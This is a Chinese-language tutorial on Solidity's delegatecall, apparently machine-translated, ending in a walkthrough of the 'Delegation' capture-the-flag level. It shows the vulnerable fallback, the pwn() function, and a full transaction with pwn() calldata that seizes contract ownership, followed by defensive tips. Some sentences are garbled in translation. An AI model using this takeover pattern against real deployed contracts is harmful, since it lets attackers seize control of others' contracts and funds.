委托調(diào)用（delegatecall）

委托調(diào)用是一種特殊的低級函數(shù)調(diào)用，旨在從另一個（通常是庫）合約中調(diào)用函數(shù)。

delegateCall（）的優(yōu)點是可以保留當前調(diào)用合約環(huán)境的內(nèi)容。此環(huán)境包括其storage及其msg.sender，msg.value屬性。

以太坊將數(shù)據(jù)存儲在存儲“插槽”中，即32字節(jié)大小的插槽。每次將變量保存到存儲時，它會自動占用當前插槽中的剩余空間，或者按順序占用下一個插槽。

在下圖中，合約A向合約B的saveX（）函數(shù)發(fā)出委托調(diào)用，該函數(shù)最終會改變合同A的存儲。

首先，Contract A通過delegatecall調(diào)用saveX函數(shù)。委托調(diào)用覆蓋合約B的存儲與存儲調(diào)用合約akaStorage A.

接下來，執(zhí)行thesaveX函數(shù)。請注意，最初合約B存儲到存儲槽0中。因此，當此函數(shù)現(xiàn)在引用變量bar時，再次查看槽0。

但是現(xiàn)在插槽0是引用指針foo，因此foo設(shè)置為x。bar仍然超出范圍，沒有受到影響。

當合約A向合約B發(fā)出委托調(diào)用時，它允許合約B自由地改變其存儲A.

顯然，當開發(fā)人員在不安全的存儲環(huán)境中使用delegatecall（）或從惡意庫繼承時，安全風險就會發(fā)生

如果存儲變量是通過低級的delegatecall訪問的，那么兩個合約的存儲布局必須對等，以便被調(diào)用合約能夠按名稱正確訪問調(diào)用合約的存儲變量。當然，如果將存儲指針作為函數(shù)參數(shù)傳遞，就像在高級庫中那樣，情況就不是同了。

現(xiàn)在利用您對delegatecall（）的理解來獲得此級別合同的所有權(quán)！

細節(jié)演練

1、delegation.sol對庫合約delegation.sol進行delegatecall。

2、注意Delegate.sol有一個名為pwn（）的公共函數(shù)，它將所有者變量的所有權(quán)更改為調(diào)用該函數(shù)的任何人！

contract Delegate {

address public owner; // Occupies slot 0

。..

function pwn（） public {

owner = msg.sender; // Save msg.sender to slot 0

}

}

3、注意，委托合同的槽0也存儲了owner，確切地說是您想要更改的變量！此外，如果您設(shè)法調(diào)用Delegation.sol中的回退函數(shù)來調(diào)用pwn（），您將成為調(diào)用合約的所有者。

function（） public {

if（delegate.delegatecall（msg.data）） {

this;

}

}

4、在以太坊中，您可以通過在事務(wù)中發(fā)送數(shù)據(jù)來調(diào)用公共函數(shù)。格式如下：

contractInstance.call（bytes4（sha3（“functionName（inputType）”））

5、使用Remix IDE或控制臺，調(diào)用Delegation.sol的回退功能：

// I did so in the console， having already computed

// the bytes4（sha3（“pwn（）”））

await sendTransaction（{

from： “0x1733d5adaccbe8057dba822ea74806361d181654”，

to： “0xe3895c413b0035512c029878d1ce4d8702d02320”，

data： “0xdd365b8b0000000000000000000000000000000000000000000000000000000000000000”

}）;

6、wait contract.owner（）顯示您現(xiàn)在是所有者！

提示：您可以執(zhí)行Remix調(diào)試器（在Javascript VM模式下）以查看存儲環(huán)境如何更改！ 您可以在Remix調(diào)試器的storage fully loaded列表中找到存儲插槽。

關(guān)鍵細節(jié)

· 使用更高級別的call（）函數(shù)繼承庫，特別是當你i）不需要更改合同存儲和ii）不關(guān)心gas控制時。

· 更改合同存儲的庫繼承時，請確保將存儲插槽與庫的存儲插槽對齊，以避免出現(xiàn)這些邊緣情況。

· 對調(diào)用delegatecalls的函數(shù)進行身份驗證并進行條件檢查。